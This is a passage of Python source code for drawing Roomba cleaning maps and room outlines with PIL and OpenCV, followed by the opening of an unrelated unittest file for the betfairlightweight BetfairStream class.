self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"] and
self.cleanMissionStatus_phase == "charge" and self.bin_full):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"]
and self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["pause"]
and self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "charge"):
# so that we will draw map and can update charge status
current_mission = None
elif ((self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]) and
self.cleanMissionStatus_phase == "hmUsrDock"):
self.current_state = self.states["cancelled"]
elif ((self.current_state == self.states["hmUsrDock"] or
self.current_state == self.states["cancelled"]) and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["hmPostMsn"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["dockend"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["charge"]
else:
self.current_state = self.states[self.cleanMissionStatus_phase]
if new_state is not None:
self.current_state = self.states[new_state]
self.log.info("set current state to: %s" % (self.current_state))
if self.current_state != current_mission:
self.log.info("updated state to: %s" % (self.current_state))
self.publish("state", self.current_state)
self.draw_map(current_mission != self.current_state)
def make_transparent(self, image, colour=None):
'''
take image and make white areas transparent
return transparent image
'''
image = image.convert("RGBA")
datas = image.getdata()
newData = []
for item in datas:
# white (ish)
if item[0] >= 254 and item[1] >= 254 and item[2] >= 254:
newData.append(self.transparent)
else:
if colour:
newData.append(colour)
else:
newData.append(item)
image.putdata(newData)
return image
def make_icon(self, input="./roomba.png", output="./roomba_mod.png"):
#utility function to make roomba icon from generic roomba icon
if not HAVE_PIL: #drawing library loaded?
self.log.error("PIL module not loaded")
return None
try:
roomba = Image.open(input).convert('RGBA')
roomba = roomba.rotate(90, expand=False)
roomba = self.make_transparent(roomba)
draw_wedge = ImageDraw.Draw(roomba)
draw_wedge.pieslice(
[(5,0),(roomba.size[0]-5,roomba.size[1])],
175, 185, fill="red", outline="red")
roomba.save(output, "PNG")
return roomba
except Exception as e:
self.log.error("ERROR: %s" % e)
return None
def load_icon(self, filename="", icon_name=None, fnt=None, size=(32,32),
base_icon=None):
'''
Load icon from file, or draw icon if file not found.
returns icon object
'''
if icon_name is None:
return None
try:
icon = Image.open(filename).convert('RGBA').resize(
size,Image.ANTIALIAS)
icon = self.make_transparent(icon)
except IOError as e:
self.log.warn("error loading %s: %s, using default icon instead"
% (icon_name,e))
if base_icon is None:
icon = Image.new('RGBA', size, self.transparent)
else:
icon = base_icon
draw_icon = ImageDraw.Draw(icon)
if icon_name == "roomba":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
355, 5, fill="red", outline="red")
elif icon_name == "stuck":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
draw_icon.polygon([(
icon.size[0]//2,icon.size[1]), (0, 0), (0,icon.size[1])],
fill = 'red')
if fnt is not None:
draw_icon.text((4,-4), "!", font=fnt,
fill=(255,255,255,255))
elif icon_name == "cancelled":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
if fnt is not None:
draw_icon.text((4,-4), "X", font=fnt, fill=(255,0,0,255))
elif icon_name == "bin full":
draw_icon.rectangle([
icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10, icon.size[1]+10],
fill = "grey")
if fnt is not None:
draw_icon.text((4,-4), "F", font=fnt,
fill=(255,255,255,255))
elif icon_name == "battery":
draw_icon.rectangle([icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10,icon.size[1]+10], fill = "orange")
if fnt is not None:
draw_icon.text((4,-4), "B", font=fnt,
fill=(255,255,255,255))
elif icon_name == "home":
draw_icon.rectangle([0,0,32,32], fill="red", outline="black")
if fnt is not None:
draw_icon.text((4,-4), "D", font=fnt,
fill=(255,255,255,255))
else:
icon = None
#rotate icon 180 degrees
icon = icon.rotate(180-self.angle, expand=False)
return icon
def initialise_map(self, roomba_size):
'''
Initialize all map items (base maps, overlay, icons, fonts, etc.)
'''
# get base image of Roomba path
if self.base is None:
'''try:
self.log.info("MAP: openening existing line image")
self.base = Image.open(
self.mapPath + '/' + self.roombaName + 'lines.png')\
.convert('RGBA')
if self.base.size != (self.mapSize[0], self.mapSize[1]):
raise IOError("Image is wrong size")
except IOError as e:
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.log.warn("MAP: line image problem: %s: created new image"
% e)
try:
self.log.info("MAP: openening existing problems image")
self.roomba_problem = Image.open(
self.mapPath + '/'+self.roombaName + 'problems.png')\
.convert('RGBA')
if self.roomba_problem.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: problems image problem: %s: created new "
"image" % e)'''
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
try:
self.log.info("MAP: openening existing map no text image")
self.previous_map_no_text = None
self.map_no_text = Image.open(
self.mapPath + '/' + self.roombaName + 'map_notext.png')\
.convert('RGBA')
if self.map_no_text.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.map_no_text = None
self.log.warn("MAP: map no text image problem: %s: set to None"
% e)
# save x and y center of image, for centering of final map image
self.cx = self.base.size[0]
self.cy = self.base.size[1]
# get a font
if self.fnt is None:
try:
self.fnt = ImageFont.truetype('FreeMono.ttf', 40)
except IOError as e:
self.log.warn("error loading font: %s, loading default font"
% e)
self.fnt = ImageFont.load_default()
#set dock home position
if self.home_pos is None:
self.home_pos = (
self.mapSize[0] // 2 + self.mapSize[2],
self.mapSize[1] // 2 + self.mapSize[3])
self.log.info("MAP: home_pos: (%d,%d)"
% (self.home_pos[0], self.home_pos[1]))
#get icons
if self.roomba_icon is None:
self.roomba_icon = self.load_icon(
filename=self.roomba_icon_file, icon_name="roomba",
fnt=self.fnt, size=roomba_size, base_icon=None)
if self.roomba_error_icon is None:
self.roomba_error_icon = self.load_icon(
filename=self.roomba_error_file, icon_name="stuck",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_cancelled_icon is None:
self.roomba_cancelled_icon = self.load_icon(
filename=self.roomba_cancelled_file, icon_name="cancelled",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_battery_icon is None:
self.roomba_battery_icon = self.load_icon(
filename=self.roomba_battery_file, icon_name="battery",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.dock_icon is None and self.home_icon_file is not None:
self.dock_icon = self.load_icon(
filename=self.home_icon_file, icon_name="home", fnt=self.fnt)
self.dock_position = (
self.home_pos[0] - self.dock_icon.size[0] // 2,
self.home_pos[1] - self.dock_icon.size[1] // 2)
if self.bin_full_icon is None:
self.bin_full_icon = self.load_icon(
filename=self.bin_full_file, icon_name="bin full",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
self.log.info("MAP: Initialisation complete")
def transparent_paste(self, base_image, icon, position):
'''
needed because PIL pasting of transparent images gives weird results
'''
image = Image.new('RGBA', self.base.size, self.transparent)
image.paste(icon,position)
base_image = Image.alpha_composite(base_image, image)
return base_image
def zero_coords(self):
'''
returns dictionary with default zero coords
'''
return {"x": 0, "y": 0, "theta": 180}
def offset_coordinates(self, old_co_ords, new_co_ords):
'''
offset coordinates according to mapSize settings, with 0,0 as center
'''
x_y = (new_co_ords["x"] + self.mapSize[0] // 2 + self.mapSize[2],
new_co_ords["y"] + self.mapSize[1] // 2 + self.mapSize[3])
old_x_y = (old_co_ords["x"]+self.mapSize[0] // 2 + self.mapSize[2],
old_co_ords["y"]+self.mapSize[1]//2+self.mapSize[3])
theta = int(new_co_ords["theta"] - 90 + self.roomba_angle)
while theta > 359: theta -= 360
while theta < 0: theta += 360
return old_x_y, x_y, theta
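# Worked example (illustrative): with mapSize (800,1500,0,0,0,0) and
# roomba_angle 0, a reported position x=100, y=-50, theta=90 maps to pixel
# co-ords (500, 700) with a drawing angle of 0 degrees (90 - 90 + 0).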
def get_roomba_pos(self, x_y):
'''
calculate roomba position as list
'''
return [x_y[0] - self.roomba_icon.size[0] // 2,
x_y[1] - self.roomba_icon.size[1] // 2,
x_y[0] + self.roomba_icon.size[0] // 2,
x_y[1] + self.roomba_icon.size[1] // 2]
def draw_vacuum_lines(self, image, old_x_y, x_y, theta):
'''
draw lines on image from old_x_y to x_y representing vacuum coverage,
taking into account angle theta (roomba angle).
'''
lines = ImageDraw.Draw(image)
if x_y != old_x_y:
self.log.info("MAP: drawing line: %s, %s" % (old_x_y, x_y))
lines.line([old_x_y, x_y], fill=self.fillColor,
width=self.roomba_icon.size[0] // 2)
#draw circle over roomba vacuum area to give smooth edges.
arcbox = [x_y[0]-self.roomba_icon.size[0] // 4,
x_y[1]-self.roomba_icon.size[0] // 4,
x_y[0]+self.roomba_icon.size[0] // 4,
x_y[1]+self.roomba_icon.size[0] // 4]
lines.ellipse(arcbox, fill=self.fillColor)
def draw_text(self, image, display_text, fnt, pos=(0,0),
colour=(0,0,255,255), rotate=False):
#draw text - (WARNING old versions of PIL have huge memory leak here!)
if display_text is None: return
self.log.info("MAP: writing text: pos: %s, text: %s"
% (pos, display_text))
if rotate:
txt = Image.new('RGBA', (fnt.getsize(display_text)),
self.transparent)
text = ImageDraw.Draw(txt)
# draw text rotated 180 degrees...
text.text((0,0), display_text, font=fnt, fill=colour)
image.paste(txt.rotate(180-self.angle, expand=True), pos)
else:
text = ImageDraw.Draw(image)
text.text(pos, display_text, font=fnt, fill=colour)
def draw_map(self, force_redraw=False):
'''
Draw map of Roomba cleaning progress
'''
if ((self.co_ords != self.previous_co_ords or
self.cleanMissionStatus_phase !=
self.previous_cleanMissionStatus_phase)
or force_redraw) and self.drawmap:
self.render_map(self.co_ords, self.previous_co_ords)
self.previous_co_ords = self.co_ords.copy()
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
def render_map(self, new_co_ords, old_co_ords):
'''
draw map
'''
draw_final = False
stuck = False
cancelled = False
bin_full = False
battery_low = False
# program just started, and we don't have phase yet.
if self.current_state is None:
return
if self.show_final_map == False:
self.log.info("MAP: received: new_co_ords: %s old_co_ords: %s "
"phase: %s, state: %s" % (
new_co_ords, old_co_ords,
self.cleanMissionStatus_phase, self.current_state))
if self.current_state == self.states["charge"]:
self.log.info("MAP: ignoring new co-ords in charge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Charging: Battery: " + \
str(self.master_state["state"]["reported"]["batPct"]) + "%"
if self.bin_full:
self.display_text = "Bin Full," + \
self.display_text.replace("Charging", "Not Ready")
if (self.last_completed_time is None or time.time() -
self.last_completed_time > 3600):
self.save_text_and_map_on_whitebg(self.map_no_text)
draw_final = True
elif self.current_state == self.states["recharge"]:
self.log.info("MAP: ignoring new co-ords in recharge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Recharging:" + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["rechrgM"]) + "m"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["pause"]:
self.log.info("MAP: ignoring new co-ords in pause phase")
new_co_ords = old_co_ords
self.display_text = "Paused: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
# assume roomba is docked...
new_co_ords = old_co_ords = self.zero_coords()
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["hmPostMsn"]:
self.display_text = "Completed: " + \
time.strftime("%a %b %d %H:%M:%S")
self.log.info("MAP: end of mission")
elif self.current_state == self.states["dockend"]:
self.log.info("MAP: mission completed: ignoring new co-ords in "
"docking phase")
new_co_ords = old_co_ords = self.zero_coords()
self.draw_final_map(True)
draw_final = True
elif (self.current_state == self.states["run"] or
self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]):
if self.current_state == self.states["run"]:
self.display_text = self.states["run"] + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
else:
self.display_text = None
self.show_final_map = False
elif self.current_state == self.states["new"]:
self.angle = self.mapSize[4] #reset angle
self.base = Image.new('RGBA', self.base.size, self.transparent)
# overlay for roomba problem position
self.roomba_problem = Image.new('RGBA', self.base.size,
self.transparent)
self.show_final_map = False
self.display_text = None
self.log.info("MAP: created new image at start of new run")
elif self.current_state == self.states["stuck"]:
self.display_text = "STUCK!: " + time.strftime("%a %b %d %H:%M:%S")
self.draw_final_map(True)
draw_final = True
stuck = True
elif self.current_state == self.states["cancelled"]:
self.display_text = "Cancelled: " + \
time.strftime("%a %b %d %H:%M:%S")
cancelled = True
elif self.current_state == self.states["dock"]:
self.display_text = "Docking"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
bin_full = True
else:
self.display_text = "Battery low: " + \
str(self.master_state["state"]["reported"]["batPct"]) + \
"%, " + self.display_text
battery_low = True
else:
self.log.warn("MAP: no special handling for state: %s"
% self.current_state)
if self.base is None:
self.log.warn("MAP: no image, exiting...")
return
if self.display_text is None:
self.display_text = self.current_state
if self.show_final_map: #just display final map - not live
self.log.debug("MAP: not updating map - Roomba not running")
return
if self.debug:
# debug final map (careful, uses a lot of CPU power!)
self.draw_final_map()
#calculate co-ordinates, with 0,0 as center
old_x_y, x_y, theta = self.offset_coordinates(old_co_ords, new_co_ords)
roomba_pos = self.get_roomba_pos(x_y)
self.log.info("MAP: old x,y: %s new x,y: %s theta: %s roomba pos: %s" %
(old_x_y, x_y, theta, roomba_pos))
#draw lines
self.draw_vacuum_lines(self.base, old_x_y, x_y, theta)
# make a blank image for the text and Roomba overlay, initialized to
# transparent text color
roomba_sprite = Image.new('RGBA', self.base.size, self.transparent)
#draw roomba
self.log.info("MAP: drawing roomba: pos: %s, theta: %s"
% (roomba_pos, theta))
has_problems = False
if stuck:
self.log.info("MAP: Drawing stuck Roomba")
self.roomba_problem.paste(self.roomba_error_icon,roomba_pos)
has_problems = True
if cancelled:
self.log.info("MAP: Drawing cancelled Roomba")
self.roomba_problem.paste(self.roomba_cancelled_icon,roomba_pos)
has_problems = True
if bin_full:
self.log.info("MAP: Drawing full bin")
self.roomba_problem.paste(self.bin_full_icon,roomba_pos)
has_problems = True
if battery_low:
self.log.info("MAP: Drawing low battery Roomba")
self.roomba_problem.paste(self.roomba_battery_icon,roomba_pos)
has_problems = True
roomba_sprite = self.transparent_paste(
roomba_sprite,
self.roomba_icon.rotate(theta, expand=False), roomba_pos)
# paste dock over roomba_sprite
if self.dock_icon is not None:
roomba_sprite = self.transparent_paste(
roomba_sprite, self.dock_icon, self.dock_position)
'''# save base lines
self.base.save(self.mapPath + '/' + self.roombaName + 'lines.png',
"PNG")
# save problem overlay
self.roomba_problem.save(self.mapPath + '/' + self.roombaName + \
'problems.png', "PNG")'''
if self.roomOutline or self.auto_rotate:
# draw room outline (saving results if this is a final map) update
# x,y and angle if auto_rotate
self.draw_room_outline(draw_final)
# merge room outline into base
if self.roomOutline:
#if we want to draw the room outline
out = Image.alpha_composite(self.base, self.room_outline)
else:
out = self.base
#merge roomba lines (trail) with base
out = Image.alpha_composite(out, roomba_sprite)
if has_problems:
#merge problem location for roomba into out
out = Image.alpha_composite(out, self.roomba_problem)
if draw_final and self.auto_rotate:
#translate image to center it if auto_rotate is on
self.log.info("MAP: calculation of center: (%d,%d), "
"translating final map to center it, x:%d, y:%d "
"deg: %.2f" % (
self.cx, self.cy, self.cx - out.size[0] // 2,
self.cy - out.size[1] // 2,
self.angle))
out = out.transform(
out.size, Image.AFFINE,
(1, 0, self.cx-out.size[0] // 2,
0, 1, self.cy-out.size[1] // 2))
# map is upside down, so rotate 180 degrees, and size to fit (NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0)
#out_rotated = out.rotate(180 + self.angle, expand=True).resize(self.base.size) #old version
out_rotated = out.rotate(180, expand=False)
# save composite image
self.save_text_and_map_on_whitebg(out_rotated)
if draw_final:
self.show_final_map = True # prevent re-drawing of map until reset
def save_text_and_map_on_whitebg(self, map):
# if no map or nothing changed
if map is None or (map == self.previous_map_no_text and
self.previous_display_text == self.display_text):
return
self.map_no_text = map
self.previous_map_no_text = self.map_no_text
self.previous_display_text = self.display_text
self.map_no_text.save(self.mapPath + '/' + self.roombaName +
'map_notext.png', "PNG")
if( self.enableMapWithText ):
final = Image.new('RGBA', self.base.size, (255,255,255,255)) # white
# paste onto a white background, so it's easy to see
final = Image.alpha_composite(final, map)
final = final.rotate(self.angle, expand=True) #(NW 12/4/2018 fixed bug causing distorted maps when rotation is not 0 - moved rotate to here)
# draw text
self.draw_text(final, self.display_text, self.fnt)
final.save(self.mapPath + '/'+self.roombaName + '_map.png', "PNG")
# try to avoid other programs reading file while writing it,
# rename should be atomic.
os.rename(self.mapPath + '/' + self.roombaName + '_map.png',
self.mapPath + '/' + self.roombaName + 'map.png')
def ScaleRotateTranslate(self, image, angle, center=None, new_center=None,
scale=None, expand=False):
'''
experimental - not used yet
'''
if center is None:
return image.rotate(angle, expand)
angle = -angle / 180.0 * math.pi
nx, ny = x, y = center
if new_center != center:
(nx, ny) = new_center
sx = sy = 1.0
if scale:
(sx, sy) = scale
cosine = math.cos(angle)
sine = math.sin(angle)
a = cosine / sx
b = sine / sx
c = x - nx * a - ny * b
d = -sine / sy
e = cosine / sy
f = y - nx * d - ny * e
return image.transform(image.size, Image.AFFINE,
(a,b,c,d,e,f), resample=Image.BICUBIC)
def match_outlines(self, orig_image, skewed_image):
orig_image = np.array(orig_image)
skewed_image = np.array(skewed_image)
try:
surf = cv2.xfeatures2d.SURF_create(400)
except Exception:
surf = cv2.SIFT(400)
kp1, des1 = surf.detectAndCompute(orig_image, None)
kp2, des2 = surf.detectAndCompute(skewed_image, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m, n in matches:
if m.distance < 0.7 * n.distance:
good.append(m)
MIN_MATCH_COUNT = 10
if len(good) > MIN_MATCH_COUNT:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good
]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good
]).reshape(-1, 1, 2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
# see https://ch.mathworks.com/help/images/examples/find-image-rotation-and-scale-using-automated-feature-matching.html for details
ss = M[0, 1]
sc = M[0, 0]
scaleRecovered = math.sqrt(ss * ss + sc * sc)
thetaRecovered = math.atan2(ss, sc) * 180 / math.pi
self.log.info("MAP: Calculated scale difference: %.2f, "
"Calculated rotation difference: %.2f" %
(scaleRecovered, thetaRecovered))
#deskew image
im_out = cv2.warpPerspective(skewed_image, np.linalg.inv(M),
(orig_image.shape[1], orig_image.shape[0]))
return im_out
else:
self.log.warn("MAP: Not enough matches are found - %d/%d"
% (len(good), MIN_MATCH_COUNT))
return skewed_image
def draw_room_outline(self, overwrite=False):
'''
draw room outline
'''
self.log.info("MAP: checking room outline")
if HAVE_CV2:
if self.room_outline_contour is None or overwrite:
try:
self.room_outline_contour = np.load(
self.mapPath + '/' + self.roombaName + 'room.npy')
except IOError as e:
self.log.warn("Unable to load room outline: %s, setting "
"to 0" % e)
self.room_outline_contour = np.array(
[(0,0),(0,0),(0,0),(0,0)], dtype=np.int)
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
room_outline_area = cv2.contourArea(self.room_outline_contour)
# edgedata = cv2.add(
# np.array(self.base.convert('L'), dtype=np.uint8),
# np.array(self.room_outline.convert('L'), dtype=np.uint8))
edgedata = np.array(self.base.convert('L'))
# find external contour
_, contours, _ = self.findContours(
edgedata,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if contours[0] is None: return
if len(contours[0]) < 5: return
max_area = cv2.contourArea(contours[0])
# experimental shape matching
# note cv2.cv.CV_CONTOURS_MATCH_I1 does not exist in CV 3.0,
# so just use 1
match = cv2.matchShapes(
self.room_outline_contour,contours[0],1,0.0)
self.log.info("MAP: perimeter/outline match is: %.4f" % match)
# if match is less than 0.35 - shapes are similar (but if it's 0 -
# then they are the same shape..) try auto rotating map to fit.
if match < 0.35 and match > 0:
#self.match_outlines(self.room_outline, self.base)
pass
if max_area > room_outline_area:
self.log.info("MAP: found new outline perimiter")
self.room_outline_contour = contours[0]
perimeter = cv2.arcLength(self.room_outline_contour,True)
outline = Image.new('RGBA',self.base.size,self.transparent)
edgeimage = np.array(outline) # make blank RGBA image array
# self.draw_edges is the max deviation from a line (set to 0.3%)
# you can fiddle with this
approx = cv2.approxPolyDP(
self.room_outline_contour,
self.draw_edges * perimeter,
True)
# outline with grey, width 1
cv2.drawContours(edgeimage,[approx] , -1, self.outlineColor, self.outlineWidth)
self.room_outline = Image.fromarray(edgeimage)
else:
if self.room_outline is None or overwrite:
try:
self.log.info("MAP: openening existing room outline image")
self.room_outline = Image.open(
self.mapPath + '/' + self.roombaName + 'room.png').\
convert('RGBA')
if self.room_outline.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.room_outline = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: room outline image problem: %s: "
"set to New" % e)
edges = ImageOps.invert(self.room_outline.convert('L'))
edges.paste(self.base)
edges = edges.convert('L').filter(ImageFilter.SMOOTH_MORE)
edges = ImageOps.invert(edges.filter(ImageFilter.FIND_EDGES))
self.room_outline = self.make_transparent(edges, (0, 0, 0, 255))
if overwrite or self.debug:
# save room outline
self.room_outline.save(
self.mapPath+'/'+self.roombaName+'room.png', "PNG")
if HAVE_CV2:
# save room outline contour as numpy array
np.save(self.mapPath + '/' + self.roombaName + 'room.npy',
self.room_outline_contour)
if self.auto_rotate:
# update outline centre
self.get_image_parameters(
image=self.room_outline, contour=self.room_outline_contour,
final=overwrite)
self.log.info("MAP: calculation of center: (%d,%d), "
"translating room outline to center it, "
"x:%d, y:%d deg: %.2f" % (
self.cx, self.cy,
self.cx - self.base.size[0] // 2,
self.cy - self.base.size[1] // 2,
self.angle))
# center room outline, same as map.
self.room_outline = self.room_outline.transform(
self.base.size, Image.AFFINE,
(1, 0, self.cx - self.base.size[0] // 2,
0, 1, self.cy-self.base.size[1]//2))
self.log.info("MAP: Wrote new room outline files")
def PIL_get_image_parameters(self, image=None, start=90, end = 0, step=-1,
recursion=0):
'''
updates angle of image, and centre using PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is PIL image
'''
if image is not None and HAVE_PIL:
imbw = image.convert('L')
max_area = self.base.size[0] * self.base.size[1]
x_y = (self.base.size[0] // 2, self.base.size[1] // 2)
angle = self.angle
div_by_10 = False
if step >= 10 or step <= -10:
step = int(step / 10)  # keep step an int so range() accepts it
div_by_10 = True
for try_angle in range(start, end, step):
if div_by_10:
try_angle /= 10.0
#rotate image and resize to fit
im = imbw.rotate(try_angle, expand=True)
box = im.getbbox()
if box is not None:
area = (box[2]-box[0]) * (box[3]-box[1])
if area < max_area:
angle = try_angle
x_y = ((box[2] - box[0]) // 2 + box[0],
(box[3] - box[1]) // 2 + box[1])
max_area = area
if recursion >= 1:
return x_y, angle
x_y, angle = self.PIL_get_image_parameters(
image,
(angle + 1) * 10,
(angle - 1) * 10, -10,
recursion + 1)
# self.log.info("MAP: PIL: image center: "
# "x:%d, y:%d, angle %.2f" % (x_y[0], x_y[1], angle))
return x_y, angle
def get_image_parameters(self, image=None, contour=None, final=False):
'''
updates angle of image, and centre using cv2 or PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is cv2 contour or PIL image
routines find the minimum area rectangle that fits the image outline
'''
if contour is not None and HAVE_CV2:
# find minimum area rectangle that fits
# returns (x,y), (width, height), theta - where (x,y) is the center
x_y,l_w,angle = cv2.minAreaRect(contour)
elif image is not None and HAVE_PIL:
x_y, angle = self.PIL_get_image_parameters(image)
else:
return
if angle < self.angle - 45:
angle += 90
if angle > 45-self.angle:
angle -= 90
if final:
self.cx = x_y[0]
self.cy = x_y[1]
self.angle = angle
self.log.info("MAP: image center: x:%d, y:%d, angle %.2f" %
(x_y[0], x_y[1], angle))
def angle_between(self, p1, p2):
'''
clockwise angle between two points in degrees
'''
if HAVE_CV2:
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return np.rad2deg((ang1 - ang2) % (2 * np.pi))
else:
side1=math.sqrt(((p1[0] - p2[0]) ** 2))
side2=math.sqrt(((p1[1] - p2[1]) ** 2))
return math.degrees(math.atan(side2/side1))
def findContours(self,image,mode,method):
'''
Version independent find contours routine. Works with OpenCV 2 or 3 or 4.
Returns modified image (with contours applied), contours list, hierarchy
'''
ver = int(cv2.__version__.split(".")[0])
im = image.copy()
if ver == 2 or ver == 4: #NW fix for OpenCV V4 21st Dec 2018
contours, hierarchy = cv2.findContours(im,mode,method)
return im, contours, hierarchy
else:
im_cont, contours, hierarchy = cv2.findContours(im,mode,method)
return im_cont, contours, hierarchy
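# Illustrative usage (this mirrors the calls elsewhere in this class):
#   _, contours, _ = self.findContours(edgedata, cv2.RETR_EXTERNAL,
#                                      cv2.CHAIN_APPROX_SIMPLE)
# so the caller code stays identical whether OpenCV 2, 3 or 4 is installed.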
def draw_final_map(self, overwrite=False):
'''
draw map with outlines at end of mission. Called when mission has
finished and Roomba has docked
'''
merge = Image.new('RGBA',self.base.size,self.transparent)
if HAVE_CV2:
# NOTE: this is CPU intensive!
edgedata = np.array(self.base.convert('L'), dtype=np.uint8)
# find all contours
_, contours, _ = self.findContours(
edgedata,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# zero edge data for later use
edgedata.fill(0)
max_perimeter = 0
max_contour = None
for cnt in contours:
perimeter = cv2.arcLength(cnt,True)
if perimeter >= max_perimeter:
max_contour = cnt # get the contour with maximum length
max_perimeter = perimeter
if max_contour is None: return
if len(max_contour) < 5: return
try:
contours.remove(max_contour) # remove max contour from list
except ValueError:
self.log.warn("MAP: unable to remove contour")
pass
mask = np.full(edgedata.shape, 255, dtype=np.uint8) # white
# create mask (of other contours) in black
cv2.drawContours(mask,contours, -1, 0, -1)
# self.draw_edges is the max deviation from a line
# you can fiddle with this in enable_map
approx = cv2.approxPolyDP(max_contour,
self.draw_edges * max_perimeter,True)
bgimage = np.array(merge) # make blank RGBA image array
# draw contour and fill with "lawngreen"
cv2.drawContours(bgimage,[approx] , -1, (124, 252, 0, 255), -1)
# mask image with internal contours
bgimage = cv2.bitwise_and(bgimage,bgimage,mask = mask)
# not sure if you really need this - uncomment if you want the
# area outlined.
# draw longest contour approximated to lines (in black), width 1
cv2.drawContours(edgedata,[approx] , -1, (255), 1)
outline = Image.fromarray(edgedata) # outline
base = Image.fromarray(bgimage) # filled background image
else:
base = self.base.filter(ImageFilter.SMOOTH_MORE)
# draw edges at end of mission
outline = base.convert('L').filter(ImageFilter.FIND_EDGES)
# outline = ImageChops.subtract(
# base.convert('L').filter(ImageFilter.EDGE_ENHANCE),
# base.convert('L'))
edges = ImageOps.invert(outline)
edges = self.make_transparent(edges, (0, 0, 0, 255))
if self.debug:
edges.save(self.mapPath+'/'+self.roombaName+'edges.png', "PNG")
merge = Image.alpha_composite(merge,base)
merge = Image.alpha_composite(merge,edges)
if overwrite:
self.log.info("MAP: Drawing final map")
self.last_completed_time = time.time()
self.base=merge
if self.debug:
merge_rotated = merge.rotate(180+self.angle, expand=True)
merge_rotated.save(
self.mapPath+'/'+self.roombaName+'final_map.png', "PNG")
|
test_betfairstream.py
|
import unittest
import socket
import time
import threading
from unittest import mock
from betfairlightweight.streaming.betfairstream import (
BetfairStream,
HistoricalStream,
HistoricalGeneratorStream,
)
from betfairlightweight.exceptions import SocketError, ListenerError
class BetfairStreamTest(unittest.TestCase):
def setUp(self):
self.mock_listener = mock.Mock()
self.mock_listener.on_data.return_value = False
self.unique_id = 1
self.app_key = "app_key"
self.session_token = "session_token"
self.timeout = 6
self.buffer_size = 1024
self.betfair_stream = BetfairStream(
self.unique_id,
self.mock_listener,
self.app_key,
self.session_token,
self.timeout,
self.buffer_size,
None,
)
def test_init(self):
assert self.betfair_stream._unique_id == self.unique_id
assert self.betfair_stream.listener == self.mock_listener
assert self.betfair_stream.app_key == self.app_key
